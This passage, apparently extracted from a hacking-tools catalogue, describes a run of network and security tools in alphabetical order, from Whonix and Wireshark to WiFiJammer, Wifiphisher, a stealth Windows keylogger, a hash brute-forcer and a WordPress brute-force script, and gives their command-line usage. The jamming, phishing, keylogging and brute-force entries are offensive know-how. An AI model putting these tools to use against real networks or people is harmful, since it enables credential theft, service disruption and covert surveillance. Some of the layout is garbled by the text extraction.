fails http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=700811
was fixed. https://phabricator.whonix.org/T68
whonix-gw-firewall, whonix-ws-firewall, whonix-host-firewall:
Made package more standalone. Requiring pre-up /usr/bin/
whonix_firewall in /etc/network/interfaces is no longer
necessary. Added etc/network/if-pre-up.d/30_whonix_firewall to
load the firewall, because of a Debian upstream bug interface
comes up even if a script in /etc/network/if-pre-up.d/ fails http://
bugs.debian.org/cgi-bin/bugreport.cgi?bug=700811 was fixed.
whonixsetup, whonix-setup-wizard: fix Tor fails after reload
related to torrc DisableNetwork setting issue by only restarting
Tor, no longer trying to reload Tor https://
rads: Improved implementation. When there is enough
RAM On enter: instantly start login manager. On ctrl + c:
instantly abort and do not start login manager. On timeout:
start login manager. Thanks to dh_systemd_start no-start we
can now use StandardInput=tty and read instead of systemdask-password. Now we could even implement an interactive
menu at boot (that allows to configure wait time and/or
disabling rads). https://phabricator.whonix.org/T57
whonixcheck: abolished random wait by default https://
anon-ws-disable-stacked-tor: fixed insserv: script
tor.anondist-orig: service tor already provided! warning during
upgrades https://phabricator.whonix.org/T303
anon-ws-disable-stacked-tor: systemd compatibility https://
anon-base-files: no longer set -o pipefail in /usr/lib/pre.bsh.
config-package-dev doesnt like set -o pipefail http://
mailman.mit.edu/pipermail/config-package-dev/2015-May/
000041.html https://phabricator.whonix.org/T329
upstream bug report: spaces in Tors systemd unit file causes
issues https://trac.torproject.org/projects/tor/ticket/16162
upstream bug report: Tor dies on reload when swichting to
DisableNetwork 0 when using DnsPort 127.0.0.1:53 https://
trac.torproject.org/projects/tor/ticket/16161
build script: fix, support verifiable false (was verifiable
minimal while build documentation said false)
uwt: multi user fix https://www.whonix.org/forum/index.php/
topic,1267
Qubes: WiFi Realtek RTL8191SEvB Issue and Solution
https://groups.google.com/forum/#!topic/qubes-users/
kMGTSwP72aU
whonix-setup-wizard API proposal: https://www.whonix.org/
wiki/Dev/whonixsetup
DownloadWhonix v11
WIFIINFOVIEW V1.79 - WIFI SCANNER FOR WINDOWS 7/8/
VISTA
WifiInfoView scans the wireless networks in your area and

displays extensive information about them, including: Network
Name (SSID), MAC Address, PHY Type (802.11g or 802.11n),
RSSI, Signal Quality, Frequency, Channel Number, Maximum
Speed, Company Name, Router Model and Router Name (Only
for routers that provides this information), and more...
When you select a wireless network in the upper pane of this
tool, the lower pane displays the Wi-Fi information elements
received from this device, in hexadecimal format.
WifiInfoView also has a summary mode, which displays a
summary of all detected wireless networks, grouped by channel
number, company that manufactured the router, PHY type, or

the maximum speed.
Columns In the Upper Pane
SSID: The name of the network.

MAC Address: MAC address of the router.
PHY Type: The PHY type for this network - 802.11a,
802.11g, 802.11n, or High-Rate DSSS
RSSI: The received signal strength indicator value, in units
of decibels referenced to 1.0 milliwatts (dBm), as detected
by the wireless LAN interface driver for the AP or peer
station.
Signal Quality: A number between 0 and 100 that
represents the quality of the signal.
Frequency: The channel center frequency of the band on
which the 802.11 Beacon or Probe Response frame was
received. The value of this column is in units of Gigahertz
(GHz).
Channel: Channel number used by this wireless network.
Information Size:The total size (in bytes) of all Wi-Fi
information elements received from this wireless network.
Elements Count: The total number of Wi-Fi information
elements received from this wireless network.
Company: The company that manufactured the router,
according to the 3 first bytes of the MAC address.
Router Model: The model of the router. This value is
displayed only for routers that provide this information
inside the Wi-Fi information elements.
Router Name: The name of the router. This value is
displayed only for routers that provide this information
inside the Wi-Fi information elements.
Security: Specifies whether the network is secured (Yes/
No).
Maximum Speed: The maximum speed (in Mbps) that
you can get when connecting to this wireless network.
First Detection: The first date/time that this network was
detected.
Last Detection: The last date/time that this network was
detected.
Detection Count: The number of times that this network
was detected.
/cfg
<Filename>
Start WifiInfoView with the specified

configuration file. For example:
WifiInfoView.exe /cfg "c:\config\csv.cfg"
WifiInfoView.exe /cfg "%AppData%
\WifiInfoView.cfg"
/
NumberOfS
cans
<Number>
Specifies the number of scans to perform

when using the save command-line options
(/scomma, /shtml, and so on...)
/stext
<Filename>
Save the list of wireless networks into a

regular text file.
/stab
<Filename>
Save the list of wireless networks into a tabdelimited text file.
/scomma
<Filename>

/stabular
<Filename>

tabular text file.
/shtml
<Filename>
Save the list of wireless networks into

/sverhtml
<Filename>
Save the list of wireless networks into

/sxml
<Filename>
Save the list of wireless networks into XML

file.
/sort
<column>

column. If you don't specify this option, the
list is sorted according to the last sort that
you made from the user interface. The
<column> parameter can specify the
column index (0 for the first column, 1 for
the second column, and so on) or the name
of the column, like "SSID" and "RSSI". You
can specify the '~' prefix character (e.g:
"~SSID") if you want to sort in descending
order. You can put multiple /sort in the
command-line if you want to sort by multiple
columns. Examples:
WifiInfoView.exe /shtml "d:\temp\wifi.html" /
sort 2 /sort ~1
WifiInfoView.exe /scomma "d:\temp
\wifi.html" /sort "~Security" /sort "SSID"
/nosort
When you specify this command-line

option, the list will be saved without any
sorting.
/
UseOnlyAd
apter <0 |
1>
Specifies whether to use only the desired

network adapter. 0 = No, 1 = Yes.
/
NetworkAda
pter
<Adapter
Guid>
Specifies the guid of the network adapter to

use, for example:
WifiInfoView.exe /UseOnlyAdapter 1 /
NetworkAdapter "{F261051F-D217-12D0B9A9-F61D323AD21E}"
/
SortOnEver
yUpdate <0
| 1>
Specifies whether to sort on every update. 0

= No, 1 = Yes.
/
MacAddress
Format <1 3>
Specifies the MAC address format. 1 = XXXX-XX-XX-XX-XX, 2 =

XX:XX:XX:XX:XX:XX, 3 =
XXXXXXXXXXXX.
/
DisplayMod
e <1 - 11>
Specifies the display mode:

1 - Full Details Mode
2 - Channels Summary Mode
3 - Companies Summary Mode
4 - PHY Types Summary Mode
5 - Max Speed Summary Mode
6 - Router Model Summary Mode
7 - Router Name Summary Mode
8 - Signal Quality Summary Mode
9 - BSS Type Summary Mode
10 - Security Summary Mode
11 - WPS Summary Mode
/
UpdateRate
<1 - 4>
Specifies the update rate: 1- Low, 2 Medium, 3 - High, 4 - Very High.
DownloadWifiInfoView v1.79
WIFIJAMMER - CONTINUOUSLY JAM ALL WIFI CLIENTS/
ROUTERS
Continuously jam all wifi clients and access points within range.
The effectiveness of this script is constrained by your wireless
card. Alfa cards seem to effectively jam within about a block
radius with heavy access point saturation. Granularity is given
in the options for more effective targeting.
Requires: python 2.7, python-scapy, a wireless card capable of
injection
Usage
Simple
python wifijammer.py
This will find the most powerful wireless interface and turn on
monitor mode. If a monitor mode interface is already up it will
use the first one it finds instead. It will then start sequentially
hopping channels 1 per second from channel 1 to 11 identifying
all access points and clients connected to those access points.
On the first pass through all the wireless channels it is only
identifying targets. After that the 1sec per channel time limit is
eliminated and channels are hopped as soon as the deauth
packets finish sending. Note that it will still add clients and APs
as it finds them after the first pass through.
Upon hopping to a new channel it will identify targets that are
on that channel and send 1 deauth packet to the client from the
AP, 1 deauth to the AP from the client, and 1 deauth to the AP
destined for the broadcast address to deauth all clients
connected to the AP. Many APs ignore deauths to broadcast
addresses.
python wifijammer.py -a 00:0E:DA:DE:24:8E -c 2
Deauthenticate all devices with which 00:0E:DA:DE:24:8E

communicates and skips channel hopping by setting the
channel to the target AP's channel (2 in this case). This would
mainly be an access point's MAC so all clients associated with
that AP would be deauthenticated, but you can also put a client
MAC here to target that one client and any other devices that
communicate with it.
Advanced
python wifijammer.py -c 1 -p 5 -t .00001 -s DL:3D:8D:JJ:
39:52 -d --world
-c, Set the monitor mode interface to only listen and deauth
clients or APs on channel 1
-p, Send 5 packets to the client from the AP and 5 packets to
the AP from the client along with 5 packets to the broadcast
address of the AP
-t, Set a time interval of .00001 seconds between sending each
deauth (try this if you get a scapy error like 'no buffer space')
-s, Do not deauth the MAC DL:3D:8D:JJ:39:52. Ignoring a
certain MAC address is handy in case you want to tempt
people to join your access point in cases of wanting to use

LANs.py or a Pineapple on them.
-d, Do not send deauths to access points' broadcast address;
this will speed up the deauths to the clients that are found
--world, Set the max channel to 13. In N. America the max
channel standard is 11, but the rest of the world uses 13
channels so use this option if you're not in N. America
Walking/driving around
python wifijammer.py -m 10
The -m option sets a max number of client/AP combos that the

script will attempt to deauth. When the max number is reached,
it clears and repopulates its list based on what traffic it sniffs in
the area. This allows you to constantly update the deauth list
with client/AP combos who have the strongest signal in case
you were not stationary. If you want to set a max and not have
the deauth list clear itself when the max is hit, just add the -n
option like: -m 10 -n
All options:
python wifijammer.py [-a AP MAC] [-c CHANNEL] [-d] [-i
INTERFACE] [-m MAXIMUM] [-n] [-p PACKETS] [-s SKIP] [-t
TIME INTERVAL]
Download WiFiJammer
WIFIPHISHER - FAST AUTOMATED PHISHING ATTACKS
AGAINST WIFI NETWORKS
Wifiphisher is a security tool that mounts fast automated

phishing attacks against WiFi networks in order to obtain secret
passphrases and other credentials. It is a social engineering
attack that unlike other methods it does not include any brute
forcing. It is an easy way for obtaining credentials from captive
portals and third party login pages or WPA/WPA2 secret
passphrases.
Wifiphisher works on Kali Linux and is licensed under the MIT
license.
From the victim's perspective, the attack makes use in three
phases:
1. Victim is being deauthenticated from her access
point. Wifiphisher continuously jams all of the target
access point's wifi devices within range by sending deauth
packets to the client from the access point, to the access
point from the client, and to the broadcast address as well.
2. Victim joins a rogue access point. Wifiphisher sniffs the
area and copies the target access point's settings. It then
creates a rogue wireless access point that is modeled on
the target. It also sets up a NAT/DHCP server and

forwards the right ports. Consequently, because of the
jamming, clients will start connecting to the rogue access
point. After this phase, the victim is MiTMed.
3. Victim is being served a realistic router config-looking
page. wifiphisher employs a minimal web server that
responds to HTTP & HTTPS requests. As soon as the
victim requests a page from the Internet, wifiphisher will
respond with a realistic fake page that asks for
credentials, for example one that asks WPA password
confirmation due to a router firmware upgrade.
Usage
S
Long
h
form
o
r
t
f
o
r
m
Explanation
maxi
mum
Choose the maximum number of clients to

deauth. List of clients will be emptied and
repopulated after hitting the limit. Example: -m
5
noup
date
Do not clear the deauth list when the

maximum (-m) number of client/AP combos is
reached. Must be used in conjunction with -m.
Example: -m 10 -n
timei
nterv
al
Choose the time interval between packets

being sent. Default is as fast as possible. If
you see scapy errors like 'no buffer space' try:
-t .00001
pack
ets
Choose the number of packets to send in

each deauth burst. Default value is 1; 1
packet to the client and 1 packet to the AP.
Send 2 deauth packets to the client and 2
deauth packets to the AP: -p 2
direct
edonl
y
Skip the deauthentication packets to the

broadcast address of the access points and
only send them to client/AP pairs
acces
spoin
t
Enter the MAC address of a specific access

point to target
jI
jamm
ingint
erfac
e
Choose the interface for jamming. By default

script will find the most powerful interface and
starts monitor mode on it.
a
I
apint
erfac
e
Choose the interface for the fake AP. By

default script will find the second most
powerful interface and starts monitor mode on
it.
Screenshots
Targeting an access point
A successful attack
Fake router configuration page
Requirements
Kali Linux.
Two wireless network interfaces, one capable of injection.
DownloadWiFiPhisher
WIFRESTI - FIND YOUR WIRELESS NETWORK
PASSWORD FROM WINDOWS, LINUX AND MAC OS
Find your wireless network password from Windows , Linux and

Mac OS.
Wifresti is a simple Wi-Fi password recovery tool , compatible
with Windows , and Unix systems (Linux , Mac OS).
Features
Recover Wifi password on Windows

Recover Wifi password on Unix
Requirements
An operating system (tested on Ubuntu, Windows 10,8,7)

Python 2.7
Instalation
sudo su
git clone https://github.com/LionSec/wifresti.git && cp
wifresti/wifresti.py /usr/bin/wifresti && chmod +x /usr/
bin/wifresti
sudo wifresti
DownloadWifresti
WIG - WEBAPP INFORMATION GATHERER
wig is a web application information gathering tool, which can

identify numerous Content Management Systems and other
administrative applications.
The application fingerprinting is based on checksums and string
matching of known files for different versions of CMSes. This
results in a score being calculated for each detected CMS and
its versions. Each detected CMS is displayed along with the
most probable version(s) of it. The score calculation is based
on weights and the amount of "hits" for a given checksum.
wig also tries to guess the operating system on the server
based on the 'server' and 'x-powered-by' headers. A database
containing known header values for different operating systems
is included in wig, which allows wig to guess Microsoft
Windows versions and Linux distribution and version.
wig features:
CMS version detection by: check sums, string matching

and extraction
Lists detected package and platform versions such as
asp.net, php, openssl, apache
Detects JavaScript libraries
Operation system fingerprinting by matching php, apache
and other packages against a values in wig's database
Checks for files of interest such as administrative login
pages, readmes, etc
Currently the wig's databases include 28,000 fingerprints
Reuse information from previous runs (save the cache)
Implement a verbose option
Remove dependency on 'requests'
Support for proxy
Proper threading support
Included check for known vulnerabilities
Requirements
wig is built with Python 3, and is therefore not compatible with
Python 2.
How it works
The default behavior of wig is to identify a CMS, and exit after

version detection of the CMS. This is done to limit the amount
of traffic sent to the target server. This behavior can be
overwritten by setting the '-a' flag, in which case wig will test all
the known fingerprints. As some configurations of applications
do not use the default location for files and resources, it is
possible to have wig fetch all the static resources it encounters
during its scan. This is done with the '-c' option. The '-m' option
tests all fingerprints against all fetched URLs, which is helpful if
the default location has been changed.
Help Screen
usage: wig.py [-h] [-l INPUT_FILE] [-n STOP_AFTER] [-a]
[-m] [-u]
[--no_cache_load] [--no_cache_save] [-N]
[--verbosity]
[--proxy PROXY] [-w OUTPUT_FILE]
[url]
WebApp Information Gatherer
url
The url to scan e.g. http://
example.com
optional arguments:
-h, --help
-l INPUT_FILE
File with urls, one per line.
-n STOP_AFTER
Stop after this amount of CMSs have
been detected. Default:

1
-a
Do not stop after the first CMS is
detected
-m
Try harder to find a match without
making more requests

-u
User-agent to use in the requests
--no_cache_load
Do not load cached responses
--no_cache_save
Do not save the cache for later use
-N
Shortcut for --no_cache_load and --
no_cache_save
--verbosity, -v
Increase verbosity. Use multiple times
for more info

--proxy PROXY
Tunnel through a proxy (format:
localhost:8080)
-w OUTPUT_FILE
File to dump results into (JSON)
Example of run:
$ ./wig.py example.com
dP
dP
dP
dP
.88888.
88
88
88
88
d8'
88
.8P
.8P
88
88
88
d8'
d8'
88
88
88.d8P8.d8P
88
Y8.
8888' Y88'
dP
`88
YP88
.88
`88888'
WebApp Information Gatherer

Redirected to http://www.example.com. Continue? [Y|n]:
TITLE
--- HTML TITLE --IP
255.255.255.256
SOFTWARE
VERSION
CATEGORY
Drupal
7.32
7.28 | 7.29 | 7.30 | 7.31 |

CMS
ASP.NET
4.0.30319.18067
Platform
Microsoft-HTTPAPI
2.0
Platform
Microsoft-IIS
6.0 | 7.0 | 7.5 | 8.0
Platform
Microsoft Windows Server
2012
2003 SP2 | 2008 | 2008 R2 |
Operating System
SOFTWARE
VULNERABILITIES
LINK
Drupal 7.28
http://cvedetails.com/version/169265
Drupal 7.29
Drupal 7.30
URL
NOTE
CATEGORY
/login/
Test directory
Interesting URL
/login/index_form.html
ASP.NET detailed error
Interesting URL
/robots.txt
robots.txt index
Interesting URL
/test/
Test directory
Interesting URL
_________________________________________________________
______________________
Time: 15.7 sec
Urls: 351
Fingerprints: 28989
Download wig
WINDOWS SPY KEYLOGGER - SOFTWARE TO LOG
KEYSTROKES IN STEALTH MODE FOR 32-BIT/64-BIT
PROCESSES ON WINDOWS XP/VISTA/7/8/10
Windows Spy Keylogger is the free software to help you

covertly monitor all activities on your computer.
It intercepts everything that is typed on keyboard and stores
into one log file which you can view it anytime later. You can
track logins, passwords, emails, chatsand all other secret
things typed by the user.
You can also customize various options including stealth mode,
run at startup, logfile etc. It is very simple to use with just a
click of button.
One of the unique feature of this tool is that you can install it
and run it on any computer without administrator
permissions. Also it works on both 32-bit & 64-bitWindows
platforms seamlessly.
It is suitable for parents who want to monitor activities of their

children. Also cyber crime investigators, penetration testers,
forensic analysts will find it very handy in their work.
Windows Spy Keylogger works on all platforms starting from
Windows XP to new Windows 10 version.
Features
Free Tool to Monitor Keystokes in stealth manner

Monitor both 32-bit & 64-bit applications
Automatically run at Startup
No need for administrator privileges
Settings dialog to change various options
Stores keyboard activities silently to a log file
Very easy to use with just a click of button
Displays current status of key logger at any time
Includes Installer for local installation & un-installation
How to Use?
'Windows Spy Keylogger' is very easy to use tool with its cool
GUI interface.
Here are the simple steps,
Run 'Windows Spy Keylogger' on your system
It will show you the current status of Keylogger as seen in
the screenshots below.
Now you can just click on button below to Start or Stop
Keylogger
That's all :)
Also you can customize various options (run at startup, log
path, version check etc) using the 'Settings Dialog' by click on
the button at bottom right corner.
DownloadWindows Spy Keylogger

WIRELESS NETWORK WATCHER V1.79 - SHOW WHO IS
CONNECTED TO YOUR WIRELESS NETWORK
Wireless Network Watcher is a small utility that scans your

wireless network and displays the list of all computers and
devices that are currently connected to your network.
For every computer or device that is connected to your
network, the following information is displayed: IP address,
MAC address, the company that manufactured the network
card, and optionally the computer name.
You can also export the connected devices list into html/xml/
csv/text file, or copy the list to the clipboard and then paste into
Excel or other spreadsheet application.
Using Wireless Network Watcher
Wireless Network Watcher doesn't require any installation

extract the executable file (WNetWatcher.exe) from the zip file,
and run it.
If you want, you can also download WNetWatcher with full
install/uninstall support (wnetwatcher_setup.exe), so a shortcut
for running WNetWatcher will be automatically added into your
start menu.
After running WNetWatcher, it automatically locates your

wireless adapter, and scans your network. After a few seconds,
you should start see the list of computers that are currently
connected to your network.
If from some reason, WNetWatcher failed to locate and scan
your network, you can try to manually choosing the correct
network adapter, by pressing F9 (Advanced Options) and
choosing the right network adapter.
Columns Description
IP Address: IP Address of the device or computer.

Device Name: The name of the device or computer. This
field may remain empty if the computer or the device
doesn't provide its name.
MAC Address: The MAC address of the network adapter.
Network Adapter Company: The company that
manufactured the network adapter, according to the MAC
Address. This column can help you to detect the type of
the device or computer. For example, if the company
name is Apple, the device is probably a Mac computer,
iPhone, or iPad.
if the company name is Nokia, the device is probably a
cellular phone of Nokia.
By default, this utility uses an internal MAC addresses
database stored inside the .exe file, but it's not always
updated with the latest MAC address assignments.
You can manually download the latest MAC addresses file
from http://standards.ieee.org/develop/regauth/oui/oui.txt
and then put oui.txt in the same folder where
WNetWatcher.exe is located. When you run
WNetWatcher.exe, it'll automatically load and use the
database.
Device Information: This column displays 'Your Computer'
if the device is the computer that you currently use. This

column displays 'Your Router' if the device is the wireless
router.
User Text: You can assign your own text to any device
detected by WNetWatcher. By default, this field is filled
with the device name. In order to change the User Text,
simply double-click the item and type the desired text.
Active: Specifies whether this device is currently active.
When a device is not detected anymore, the 'Active' value
is turned from 'Yes' to 'No'
Background Scan
Starting from version 1.15, there is a new option under the

Options menu - 'Background Scan'.
When it's turned on, Wireless Network Watcher first make the
regular fast network scan to discover all current connected
devices. After that, a continuous background scan is activated
to discover when new devices are connected to your network.
The background scan is slower and less intensive then the
regular scan, so it won't overload your computer and you can
leave it to run in the background while using other programs.
When the background scan is running, a counter of the scan
process is displayed in the second section of the bottom status
bar.
When the background scan is used, you can use the 'Beep On
New Device' option to get a beep sound when a new device is
detected.
/cfg
<Filename
>
Start Wireless Network Watcher with the

specified configuration file. For example:
WNetWatcher.exe /cfg "c:\config\wnw.cfg"
WNetWatcher.exe /cfg "%AppData%
\WNetWatcher.cfg"
/stext
<Filename
>
Scan your network, and save the network

devices list into a regular text file.
/stab
<Filename
>

devices list into a tab-delimited text file.
/scomma
<Filename
>

devices list into a comma-delimited text file
(csv).
/stabular
<Filename
>

devices list into a tabular text file.
/shtml
<Filename
>

devices list into HTML file (Horizontal).
/sverhtml
<Filename
>

devices list into HTML file (Vertical).
/sxml
<Filename
>

devices list into XML file.
DownloadWireless Network Watcher v1.79

WIRELESS NETWORK WATCHER V1.81 - SHOW WHO IS
CONNECTED TO YOUR WIRELESS NETWORK
Wireless Network Watcher is a small utility that scans your

wireless network and displays the list of all computers and
devices that are currently connected to your network.
For every computer or device that is connected to your
network, the following information is displayed: IP address,
MAC address, the company that manufactured the network
card, and optionally the computer name.
You can also export the connected devices list into html/xml/
csv/text file, or copy the list to the clipboard and then paste into
Excel or other spreadsheet application.
Using Wireless Network Watcher
Wireless Network Watcher doesn't require any installation

extract the executable file (WNetWatcher.exe) from the zip file,
and run it.
If you want, you can also download WNetWatcher with full
install/uninstall support (wnetwatcher_setup.exe), so a shortcut

for running WNetWatcher will be automatically added into your
start menu.
After running WNetWatcher, it automatically locates your
wireless adapter, and scans your network. After a few seconds,
you should start see the list of computers that are currently
connected to your network.
If from some reason, WNetWatcher failed to locate and scan
your network, you can try to manually choosing the correct
network adapter, by pressing F9 (Advanced Options) and
choosing the right network adapter.
Columns Description
IP Address: IP Address of the device or computer.

Device Name: The name of the device or computer. This
field may remain empty if the computer or the device
doesn't provide its name.
MAC Address: The MAC address of the network adapter.
Network Adapter Company: The company that
manufactured the network adapter, according to the MAC
Address. This column can help you to detect the type of
the device or computer. For example, if the company
name is Apple, the device is probably a Mac computer,
iPhone, or iPad.
if the company name is Nokia, the device is probably a
cellular phone of Nokia.
By default, this utility uses an internal MAC addresses
database stored inside the .exe file, but it's not always
updated with the latest MAC address assignments.
You can manually download the latest MAC addresses file
from http://standards.ieee.org/develop/regauth/oui/oui.txt
and then put oui.txt in the same folder where
WNetWatcher.exe is located. When you run
WNetWatcher.exe, it'll automatically load and use the

database.
Device Information: This column displays 'Your Computer'

if the device is the computer that you currently use. This
column displays 'Your Router' if the device is the wireless
router.
User Text: You can assign your own text to any device
detected by WNetWatcher. By default, this field is filled
with the device name. In order to change the User Text,
simply double-click the item and type the desired text.
Active: Specifies whether this device is currently active.
When a device is not detected anymore, the 'Active' value
is turned from 'Yes' to 'No'
Background Scan
Starting from version 1.15, there is a new option under the

Options menu - 'Background Scan'.
When it's turned on, Wireless Network Watcher first make the
regular fast network scan to discover all current connected
devices. After that, a continuous background scan is activated
to discover when new devices are connected to your network.
The background scan is slower and less intensive then the
regular scan, so it won't overload your computer and you can
leave it to run in the background while using other programs.
When the background scan is running, a counter of the scan
process is displayed in the second section of the bottom status
bar.
When the background scan is used, you can use the 'Beep On
New Device' option to get a beep sound when a new device is
detected.
/cfg
<Filename
>
Start Wireless Network Watcher with the

specified configuration file. For example:
WNetWatcher.exe /cfg "c:\config\wnw.cfg"
WNetWatcher.exe /cfg "%AppData%
\WNetWatcher.cfg"
/stext
<Filename
>

devices list into a regular text file.
/stab
<Filename
>

devices list into a tab-delimited text file.
/scomma
<Filename
>

devices list into a comma-delimited text file
(csv).
/stabular
<Filename
>

devices list into a tabular text file.
/shtml
<Filename
>

devices list into HTML file (Horizontal).
/sverhtml
<Filename
>

devices list into HTML file (Vertical).
/sxml
<Filename
>

devices list into XML file.
DownloadWireless Network Watcher v1.81

WIRESHARK V2.0 - THE WORLDS FOREMOST NETWORK
PROTOCOL ANALYZER
Wiresharkis the worlds foremost network protocol analyzer. It

lets you capture and interactively browse the traffic running on
a computer network. It is the de facto (and often de jure)
standard across many industries and educational institutions.
Wiresharkdevelopment thrives thanks to the contributions of
networking experts across the globe. It is the continuation of a
project that started in 1998.
Wireshark 2.0.0rc2 has been released. This is the second

release candidate for Wireshark 2.0. Installers for Windows, OS
X, and source code are now available.
The following features are new (or have been significantly
updated) since version 2.0.0rc1:
For new installations on UN*X, the directory for user
preferences is $HOME/.config/wireshark rather than
$HOME/.wireshark. If that directory is absent, preferences
will still be found and stored under $HOME/.wireshark.
Qt port:
The SIP Statistics dialog has been added.
You can now create filter expressions from the
display filter toolbar.
Bugs in the UAT prefererences dialog has been
fixed.
Several dissector and Qt UI crash bugs have been fixed.

Problems with the Mac OS X application bundle have
been fixed.
The following features are new (or have been significantly
updated) since version 1.99.9:
Qt port:
The LTE RLC Graph dialog has been added.
The LTE MAC Statistics dialog has been added.
The LTE RLC Statistics dialog has been added.
The IAX2 Analysis dialog has been added.
The Conversation Hash Tables dialog has been
added.
The Dissector Tables dialog has been added.
The Supported Protocols dialog has been added.
You can now zoom the I/O and TCP Stream graph X
and Y axes independently.
The RTP Player dialog has been added.
Several memory leaks have been fixed.
Changes in Wireshark 2.0
Capture options. Capture options have been simplified and

consolidated. In 1.12 they are spread out in many places
across several windows. In 2.0 they are in two places: the
Capture Options dialog (CaptureOptions or the gear icon in
the toolbar) and the Manage Interfaces dialog, which you can
open by pressing Manage Interfaces in the Capture Options
dialog.
Streamlined preferences. Preferences windows usually arent
something to get excited about and this is no exception, but its
important to note that in the process of removing clutter some
preferences have been removed from the main window.
Theyre still available in the Advanced preference section
which lists every available preference item.
Translations. Thanks to the hard work of many contributors
the new interface supports multiple languages. You can now
select between Chinese, English, French, German, Italian,
Japanese, and Polish in the Appearance preferences section.
Many more translations are underway. You can see the status
the translation efforts and help out with the effort at https://
www.transifex.com/wireshark/wireshark/.
Related packets. As you scroll through the packet list you
might notice little symbols pop up along its left edge. For
example, you might see left and right arrows for DNS requests
and Replies, or a check mark to denote an ACKed TCP packet.
These are related packets. This exposes some plumbing weve
had in place for a long time, but its now shown in the main
window instead of buried deep in the packet detail tree.
Intelligent scrollbar. As you scroll through the packet list you
might notice that the scroll bar itself looks odd. It now features a
map of nearby packets, similar to the minimap available in
many modern text editors. The number of packets shown in the
map is the same as the number of physical vertical pixels in
your scrollbar. The more pixels you have, the more packets you
can see. In other words, if you use Wireshark regularly you now
have a legitimate business case for a retina display.
Statistics dialogs. The dialogs under the Statistics and
Telephony menus have seen many improvements. The
backend code has been consolidated so that most of
Wiresharks statistics now share common internal logic. This in
turn let us create common UI code with many workflow
improvements and a much more consistent interface.
I/O Graph dialog. You can now graph as many items as you
like and save graphs as PDF, PNG, JPEG, and BMP. Graph
settings stay with your profile so you can customize them for
multiple environments.
Follow Stream dialog. You can now switch between streams
and search for text.
General dialogs. Many dialogs now have context-aware hints.
For example the I/O Graph and Follow Stream dialogs will tell
you which packet corresponds to the graph or stream data
under your cursor. Most of them will stay open after you close a
capture file so that you can compare statistics or graphs
between captures.
DownloadWireshark v2.0.0
WOODPECKER HASH BRUTEFORCE - MULTITHREADED
PROGRAM TO PERFORM A BRUTE-FORCE ATTACK
AGAINST A HASH
Woodpecker hash Bruteforceis a fast and easy-to-use

multithreaded program to perform a brute-force attack against a
hash. It supports many common hashing algorithms such as
md5, sha1, etc. It runs on Windows and Mac OS. You can use
dictionary, alphabet-based or random bruteforce.
Here you can download Woodpecker hash Bruteforce for
Windows and Mac OS.
How to use:
1. Open cmd.exe on Windows or Terminal on Mac OS
2. Drag downloaded file in the terminal
3. Hit space (it it wasn't added automatically after the
filename) and type help (with two dashes)

4. Some help will be shown to you
5. You may want to run the examples first
6. Start bruteforcing!
Supported hash types:
MD2 32 characters
MD4 32 characters
MD5 32 characters
SHA1 40 characters
SHA224 56 characters
Supported bruteforce types:
Dummy using letter combinations of letters of given
alphabet
Random using random letter combinations of letters of
given alphabet (use if other types do not succeed)
Wordlist-based using words from given wordlist
News
22.02.2015 - Version 0.9.1 is here!

1. Ability to start program by double-clicking it (beta)
2. Bug fixes, stability and speed improvements
20.02.2015 - Version 0.9 is out!
1. Finally, Woodpecker hash Bruteforce is now
multithreaded on both Windows and Mac OS!
2. B u g fi x e s , s t a b i l i t y , s p e e d a n d i n t e r f a c e
improvements
8.02.2015 - Version 0.8 is out!
1. Ability to start interrupted session using '-R' flag
2. New bruteforce type - random bruteforce using '-r'
flag
3. Results are now saved in case of sudden termination
4. B u g fi x e s , s t a b i l i t y , s p e e d a n d i n t e r f a c e
improvements
16.01.2015 - Version 0.7 published!

1. Bug fixes and stability improvements (fixed the
alphabet bug on Windows)
2. Slight speed and logic improvements
28.12.2014 - Added video tutorial in the bottom of the
"Tutorial" page
7.12.2014 - Version 0.6 published!
1. Now works better with dictionaries and wordlists
2. You can supply your own alphabet
3. Now you are able to save results
Download Woodpecker hash Bruteforce

WORDBRUTEPRESS - WORDPRESS BRUTE FORCE
MULTITHREADING WITH STANDARD AND XML-RPC
LOGIN METHOD
Wordpress Brute Force Multithreading with standard and xmlrpc login method written in python.
Features:
1.
2.
3.
4.
5.
Multithreading
xml-rpc brute force mode
http and https protocols support
Random User Agent
Big wordlist support
Usage:
Standard login request:
python wordbrutepress.py -S -t http[s]://
target.com[:port] -u username -w wordlist [--timeout in
sec]
Xml-rpc login request:
python wordbrutepress.py -X -t http[s]://
target.com[:port] -u username -w wordlist [--timeout in
sec]
CHANGELOG
2015-11-20 v2.1
1) Add new feature: Big wordlist support (thanks to guly
@theguly)
2) Fix faultcode check instead of "403" code for XML-RPC
(thanks to guly @theguly)
2015-04-12 v2.0
1) Add new feature: xml-rpc brute force mode
2) Fix minor bugs
2015-04-11 v1.1
1) optparse (Deprecated since version 2.7) replaced by
argparse
2) Fix connection bugs
Download Wordbrutepress
WPHARDENING 1.5 - FORTIFY THE SECURITY OF ANY
WORDPRESS INSTALLATION
Fortify the security of any WordPress installation.

Installation
Installing WPHardening requires you to execute one console

command:
$ pip install -r requirements.txt
Usage
$ python wphardening.py -h
__
_______
\ \
/ /
__ \| |
| |
| |
(_)
\ \
/\
_ __
/ /| |__) | |__| | __ _ _ __ __| | ___ _ __
__ _
\ \/
\/ / |
___/|
__
|/ _` | '__/ _` |/ _ \ '_ \|
| '_ \ / _` |
\
/\
| |
| |
| | (_| | | | (_| |
|_|
|_|
|_|\__,_|_|
__/ | | |
| | | | (_| |
\/
\/
\__,_|\___|_| |_|
_|_| |_|\__, |
__/ |
Fortify the security of any WordPress
installation.
|___/
Sponsored by SYHUNT - http://www.syhunt.com

Usage: python wphardening.py [options]
Options:
--version
show program's version number and
exit
-h, --help
-v, --verbose
Active verbose mode output
results
--update
stable version
Check for WPHardening latest
Target:
This option must be specified to modify the package
WordPress.
-d DIRECTORY, --dir=DIRECTORY
**REQUIRED** - Working Directory.
--load-conf=FILE
Load file configuration.
Hardening:
Different tools to hardening WordPress.
-c, --chmod
Chmod 755 in directory and 644 in
files.
-r, --remove
Remove files and directory.
-b, --robots
Create file robots.txt
-f, --fingerprinting
Deleted fingerprinting WordPress.
-t, --timthumb
Find the library TimThumb.
--chown=user:group
Changing file and directory
owner.
--wp-config
Wizard generated wp-config.php
--plugins
Download Plugins Security.
--proxy=PROXY
Use a HTTP proxy to connect to
the target url for

--plugins and --wp-config.
--indexes
It allows you to display the
contents of directories.
--minify
and .js
Compressing static file .css
--malware-scan
Malware Scan in WordPress
project.
Miscellaneous:
